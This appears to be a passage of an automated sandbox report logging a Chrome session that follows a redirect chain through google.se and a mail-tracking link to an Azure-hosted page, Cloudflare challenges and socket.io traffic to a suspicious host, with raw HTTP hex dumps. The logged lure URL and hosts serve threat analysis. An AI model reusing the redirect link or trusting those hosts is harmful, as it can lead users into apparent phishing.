                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 38 61 33 39 38 64 36 34 32 33 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd8a398d6423a-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1287INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                Data Ascii: n-wrapper,body,html{height:100%;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 6e 2d 64 65 6c 61 79 3a 2e 33 73 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 7b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d
                                                                                                                                                                                                                                Data Ascii: n-delay:.3s}#success-pre-i{height:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78
                                                                                                                                                                                                                                Data Ascii: text a:visited,.theme-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-tex
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 2d 64 61 72 6b 20 23 71 72 7b 66 69 6c 6c 3a 23 66 33 38 30 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63
                                                                                                                                                                                                                                Data Ascii: -dark #qr{fill:#f38020}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:foc
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 6e 64 65 78 3a 39 39 39 39 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d
                                                                                                                                                                                                                                Data Ascii: ndex:9999}#challenge-overlay a,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 61 72 65 61 3a 31 2f 31 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74
                                                                                                                                                                                                                                Data Ascii: area:1/1;height:24px;transition:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-st
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 65 6e 74 65 72 20 66 6c 65 78 2d 65 6e 64 7d 2e 72 74 6c 7b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e
                                                                                                                                                                                                                                Data Ascii: enter flex-end}.rtl{direction:rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #brandin
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1369INData Raw: 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 32 30 30 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20
                                                                                                                                                                                                                                Data Ascii: n:absolute;top:0;width:200px}#challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                147192.168.2.449907104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd86f5fc70ca2/1727989059466/V1GlFmnFZc-pbXa HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:44 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8a3f8ec8c36-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 59 08 02 00 00 00 0c cc c5 9d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRFYIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                148192.168.2.449910104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccfd86f5fc70ca2/1727989059468/8262e1a5d8c7f6e36790f7545360055c84a0e1010c841f292d392d87da925b25/GdLY_XkM0DHPAvG HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:44 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 67 6d 4c 68 70 64 6a 48 39 75 4e 6e 6b 50 64 55 55 32 41 46 58 49 53 67 34 51 45 4d 68 42 38 70 4c 54 6b 74 68 39 71 53 57 79 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ggmLhpdjH9uNnkPdUU2AFXISg4QEMhB8pLTkth9qSWyUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1INData Raw: 4a
                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                149192.168.2.44991179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB9aE&sid=QVT9suDRefEWf0f5AANg HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:44 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:44 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:16:56:48
                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:16:56:51
                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2232,i,15471388682000666349,14317564674064467546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:16:56:53
                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M"
                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                No disassembly